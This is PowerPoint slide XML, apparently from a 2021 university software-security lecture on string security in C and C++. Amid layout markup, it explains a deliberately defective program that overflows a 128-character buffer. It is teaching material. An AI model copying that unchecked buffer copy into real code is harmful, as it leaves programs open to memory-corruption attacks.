              <a:t>The defective program accepts a string argument (line 1), copies it to the buff character array (lines 5-9), and prints the contents of the buffer (line 10). The variable buff is declared as a fixed array of 128 characters (line 3). If the first argument to the program equals or exceeds 128 characters (remember the trailing null character), the program writes outside the bounds of the fixed-size array.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422158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rgbClr val="FF0000"/>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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2015360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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="483312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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172930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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400878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D21C09B4-D851-4043-BACE-08EB012A6BE7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3880272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able Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719263"/>
            <a:ext cx="8229600" cy="4411662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 5"/>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3004D887-5878-D44E-9983-6476AABB8F49}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="451027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E0396C37-D757-4C4B-BB0E-69DE745872CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5122FC81-CFD4-B544-AF07-8664514F62E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D99D8D4-FA1A-AE44-9C6F-026FCDEFA981}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6032F0FA-E40B-AF41-975F-3FDAD89122D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="964434"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="副标题 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C815935F-10D3-8345-9538-0F3870C0CD91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780708" y="2907423"/>
            <a:ext cx="7677492" cy="1607127"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr b="1" i="0" u="none">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDCB5DE-E5C6-D242-AC80-B710CB791666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="4987515"/>
            <a:ext cx="5486400" cy="804862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108866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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3108050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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121167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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1761764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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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6688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1183823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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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6688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2545330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734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18</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6688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3544034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90734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18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688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1852752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734B5-B36B-FD48-B0D2-7A41A85B8C9F}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/12/18</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latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6688DD34-B7E2-E24A-985D-FB59DCA79997}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB8CD5BD-0222-C34C-BBC9-7C67428A5ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-251" y="-5056"/>
            <a:ext cx="9144000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="990000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AD045FA-D564-8640-AB41-A837A25D54DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="-54977"/>
            <a:ext cx="5334000" cy="338554"/>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altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software Security, BUPT, 2021, Fall</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2914905594"/>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mailto:some@badguy.net"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7C6E0F7-6C29-534B-A685-BE30411AD49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Arial Narrow" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>软件安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="副标题 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2AD8BC-D928-8543-814D-BC5A1F9637A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial Narrow" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD9D1DA-E1BD-494F-A6A8-C15A2F9A147D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>徐国胜</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>北京邮电大学</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2888167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670B1-7D4F-41CD-B3DC-ACDBDB2CA408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字面值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B57EE0-0EFA-4818-965C-4C5514F1193E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个字符串的字面值是一个包围在双引号中的零个或者更多个字符的序列。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3102A4C6-6675-4B2B-829E-03A9A6030998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300591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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>标准：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>标准的类模板</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>std</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
